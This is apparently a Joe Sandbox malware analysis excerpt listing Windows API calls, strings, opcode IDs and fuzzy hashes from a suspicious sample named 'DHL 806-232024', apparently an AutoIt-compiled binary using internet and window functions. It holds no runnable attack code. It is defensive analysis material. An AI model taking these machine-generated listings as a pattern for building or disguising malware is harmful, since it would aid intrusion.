                                                                                  • _memset.LIBCMT ref: 00942892
                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009428C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CrackInternet_memset
                                                                                  • String ID: |
                                                                                  • API String ID: 1413715105-2343686810
                                                                                  • Opcode ID: 879a25ffc8cf4eac01803eb5b505f5b9f52579d8b699d7f00c4f59dca82d169c
                                                                                  • Instruction ID: e2ffff8a16f45eeb488dce2a1e09f72ef8e3111f991670cf451c3825fc10de96
                                                                                  • Opcode Fuzzy Hash: 879a25ffc8cf4eac01803eb5b505f5b9f52579d8b699d7f00c4f59dca82d169c
                                                                                  • Instruction Fuzzy Hash: 82313D71810119AFCF01EFA5CC85EEEBFB9FF08350F10412AF815A6266EB315A56DB61
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00956D86
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00956DC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$DestroyMove
                                                                                  • String ID: static
                                                                                  • API String ID: 2139405536-2160076837
                                                                                  • Opcode ID: a010839821e8d447d0b87f4b8f21649ca00717efcb6f2fcbfb50dfb5c6177d42
                                                                                  • Instruction ID: 3ef9ab8e8e864e38fd453157e207d27c96601a6d16f37aa0d79d4e2650b70a8f
                                                                                  • Opcode Fuzzy Hash: a010839821e8d447d0b87f4b8f21649ca00717efcb6f2fcbfb50dfb5c6177d42
                                                                                  • Instruction Fuzzy Hash: 16318D71210604AAEB10DF69CC90BFB77BDFF88721F508A19F9A5C7190DA31AC95DB60
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00932E00
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00932E3B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: a00d2b8d67042b21b367db2765274627c4682fe3ffafcdf842fb712a60447295
                                                                                  • Instruction ID: 970e71f70e5052ff2bd37142bf204db9dc936f0c2fc1f8dfc25098eeb418c538
                                                                                  • Opcode Fuzzy Hash: a00d2b8d67042b21b367db2765274627c4682fe3ffafcdf842fb712a60447295
                                                                                  • Instruction Fuzzy Hash: DB31E631604309EBEB34CF58D846BAEBBBDFF45350F14042AE995E61A0E7749940CF51
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009569D0
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009569DB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Combobox
                                                                                  • API String ID: 3850602802-2096851135
                                                                                  • Opcode ID: d754452f6bd9f58746caab25234981be885daa6effa0a71bf431f2ac499bf8f0
                                                                                  • Instruction ID: bc95859719afc3e439746260e4795f8388d7b2aa4e4f14c4b6f343b28314ea71
                                                                                  • Opcode Fuzzy Hash: d754452f6bd9f58746caab25234981be885daa6effa0a71bf431f2ac499bf8f0
                                                                                  • Instruction Fuzzy Hash: C911E2712002086FEF11DF29CCA0EAB376EEB893A5F500125FD5897290D6319C5587A0
                                                                                  APIs
                                                                                    • Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
                                                                                    • Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
                                                                                    • Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00956EE0
                                                                                  • GetSysColor.USER32(00000012), ref: 00956EFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                  • String ID: static
                                                                                  • API String ID: 1983116058-2160076837
                                                                                  • Opcode ID: 3e3d094274cafbf68da204c23156a7515122066a4d0075cb8d44bfe1f0307575
                                                                                  • Instruction ID: 5edfa7d760ccc140129fabe42328147d42e1ea5c5f2b986c9587a8f23c52e240
                                                                                  • Opcode Fuzzy Hash: 3e3d094274cafbf68da204c23156a7515122066a4d0075cb8d44bfe1f0307575
                                                                                  • Instruction Fuzzy Hash: 0A215972A20209AFDF04DFA9CD45AFA7BB8FB08315F044629FD55D3250E734E8659B50
                                                                                  APIs
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00956C11
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00956C20
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                  • String ID: edit
                                                                                  • API String ID: 2978978980-2167791130
                                                                                  • Opcode ID: fe1da73ba937cb233a278f7da8836a57ac3fc5254ef9052d46b7eec46c4c06a2
                                                                                  • Instruction ID: 963f336128aa6f40f84ca6a71e51c579438b46e170c8bc0acf60ebad0ddfc638
                                                                                  • Opcode Fuzzy Hash: fe1da73ba937cb233a278f7da8836a57ac3fc5254ef9052d46b7eec46c4c06a2
                                                                                  • Instruction Fuzzy Hash: B1119D71105208ABEF108E65DC41ABB376DEB4437AF904724FEA0D71E0C735EC99A760
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00932F11
                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00932F30
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: c0497647065d15a94f7e5e893b3049e83399340784f3a0ee6fef6b70534be4d9
                                                                                  • Instruction ID: 584e98762585e5163e780864cd5d3de32f596a1def4fe8157f98d26f65a556e7
                                                                                  • Opcode Fuzzy Hash: c0497647065d15a94f7e5e893b3049e83399340784f3a0ee6fef6b70534be4d9
                                                                                  • Instruction Fuzzy Hash: 4A11EF32915228ABCB20DF5DDC45BAA73BDEB05350F0800A2E944AB2A0D7B0EE04CF91
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00942520
                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00942549
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$OpenOption
                                                                                  • String ID: <local>
                                                                                  • API String ID: 942729171-4266983199
                                                                                  • Opcode ID: 8c19d645ed4071586db50a43fcae1d4646fcfdf15be39471c64c4be4be0a70a5
                                                                                  • Instruction ID: 0545f3ff47917798ff7909409b367131ae73dd72d74cb75d98cb02cc83a6ed47
                                                                                  • Opcode Fuzzy Hash: 8c19d645ed4071586db50a43fcae1d4646fcfdf15be39471c64c4be4be0a70a5
                                                                                  • Instruction Fuzzy Hash: 2511CEB0601225BADB249F628C99EBBFFACFF06765F50812AF90547140D2B46981DBF0
                                                                                  APIs
                                                                                    • Part of subcall function 0094830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009480C8,?,00000000,?,?), ref: 00948322
                                                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB
                                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00948108
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 2496851823-2422070025
                                                                                  • Opcode ID: a7b417bcce42cbe6dec7ff20cb9a998fed83079c5fb2cbe1614b091edf6c8bf5
                                                                                  • Instruction ID: 77d721b0b6140bc6f6a72d44cedac2c3806a7994ab4ee22986e176c5aa93ee6c
                                                                                  • Opcode Fuzzy Hash: a7b417bcce42cbe6dec7ff20cb9a998fed83079c5fb2cbe1614b091edf6c8bf5
                                                                                  • Instruction Fuzzy Hash: 5811E134204315ABDB20AF64CC46FFEB374FF48320F108627EA1197291DB72A801C795
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00929355
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 372448540-1403004172
                                                                                  • Opcode ID: 85421f5ef8c8f6da53ded5d0ca38c873cd19739fbc6ddf33d72ef8bd23f3b5e2
                                                                                  • Instruction ID: 70e8b66d5859eb8edc93bd502d8b9a9eda559996b6ed9cf05463f3b3fbce777e
                                                                                  • Opcode Fuzzy Hash: 85421f5ef8c8f6da53ded5d0ca38c873cd19739fbc6ddf33d72ef8bd23f3b5e2
                                                                                  • Instruction Fuzzy Hash: F801D271A45224AB8B04EB64CC919FE73A9FF46320F14071AF832973D5DB3158088751
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock_memmove
                                                                                  • String ID: EA06
                                                                                  • API String ID: 1988441806-3962188686
                                                                                  • Opcode ID: 79453de18e0c039a78f3b14d0d74a9c55de6849349811bd62c82d8976e7a0988
                                                                                  • Instruction ID: 4e3361c6787b9ef62e9d5a788e72db9a1445a7e17d5815bec52dee496958648f
                                                                                  • Opcode Fuzzy Hash: 79453de18e0c039a78f3b14d0d74a9c55de6849349811bd62c82d8976e7a0988
                                                                                  • Instruction Fuzzy Hash: 6301F971914218AEDB28CAA8C81AFFE7BFCDB01311F00419AF652D2181E5B5E6048B60
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0092924D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 372448540-1403004172
                                                                                  • Opcode ID: 27956885180476ef610eed7dd3408ef88e8575347100e5d49a62e74ba400b812
                                                                                  • Instruction ID: 9d2dec4d3a30373e916e36b4dd9dd3b0554678679891507972658e05f7d1d726
                                                                                  • Opcode Fuzzy Hash: 27956885180476ef610eed7dd3408ef88e8575347100e5d49a62e74ba400b812
                                                                                  • Instruction Fuzzy Hash: DB01A771A41229BBCB19EBA4D992EFF73ACEF45300F14011AB912A7385EE155F0C9672
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 009292D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 372448540-1403004172
                                                                                  • Opcode ID: 49b543d439fc1db811a79c667c995634192eefe9ad73b52e5547d5d0db36b8cc
                                                                                  • Instruction ID: 00c925ab828ce528732a40b5914afc989610b15927147081fb6d9a9cfe2c57fe
                                                                                  • Opcode Fuzzy Hash: 49b543d439fc1db811a79c667c995634192eefe9ad73b52e5547d5d0db36b8cc
                                                                                  • Instruction Fuzzy Hash: CE01DB71A41129BBCB15F7A4D982EFF77ACEF11300F2401167812B3385DA155F0C9272
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp
                                                                                  • String ID: #32770
                                                                                  • API String ID: 2292705959-463685578
                                                                                  • Opcode ID: a6409c16e708413ab8a8695bcf5506fc047be029fe5fbf337673c567853bee3d
                                                                                  • Instruction ID: f16886632beba5ca38535d41774f72b1d745b1f9b7334211f5dbeb9ab4e54635
                                                                                  • Opcode Fuzzy Hash: a6409c16e708413ab8a8695bcf5506fc047be029fe5fbf337673c567853bee3d
                                                                                  • Instruction Fuzzy Hash: CFE06832A0432C2BE320AAA9AC09FA7F7ACFB45731F01006BFD20D3040E5609A448BE1
                                                                                  APIs
                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009281CA
                                                                                    • Part of subcall function 008F3598: _doexit.LIBCMT ref: 008F35A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message_doexit
                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                  • API String ID: 1993061046-4017498283
                                                                                  • Opcode ID: 82283f99ce586e27a86000fa5b8be7aa126b5e1ce5194bf8ff6602e3daa92a15
                                                                                  • Instruction ID: 4d3136990a6419524a47071e204eb867983ff5b05d85df88e2ded27ab2500383
                                                                                  • Opcode Fuzzy Hash: 82283f99ce586e27a86000fa5b8be7aa126b5e1ce5194bf8ff6602e3daa92a15
                                                                                  • Instruction Fuzzy Hash: A7D05B323C672C32D21432BD6C0BFDA76489B55B56F044016FB08D55D38DD5599153DA
                                                                                  APIs
                                                                                    • Part of subcall function 0090B564: _memset.LIBCMT ref: 0090B571
                                                                                    • Part of subcall function 008F0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0090B540,?,?,?,008D100A), ref: 008F0B89
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,008D100A), ref: 0090B544
                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008D100A), ref: 0090B553
                                                                                  Strings
                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0090B54E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                  • API String ID: 3158253471-631824599
                                                                                  • Opcode ID: da9ba24fdac47746fe095abe0ad5c8ffd7ab6ec01f5c8b61791ab115cf7f80f6
                                                                                  • Instruction ID: 77ba2ab8ae57e57134ff3d9313f73e678687964873c5250856590428173a2fbb
                                                                                  • Opcode Fuzzy Hash: da9ba24fdac47746fe095abe0ad5c8ffd7ab6ec01f5c8b61791ab115cf7f80f6
                                                                                  • Instruction Fuzzy Hash: 06E06DB02147118FD720DF29D8047467BE4AF00755F00896DF456C3791E7B4D408CB61
                                                                                  APIs
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00955BF5
                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00955C08
                                                                                    • Part of subcall function 009354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: c69e9f36f3ab309c762895e714999fc5ee136c17118e87f31b25a086676329a3
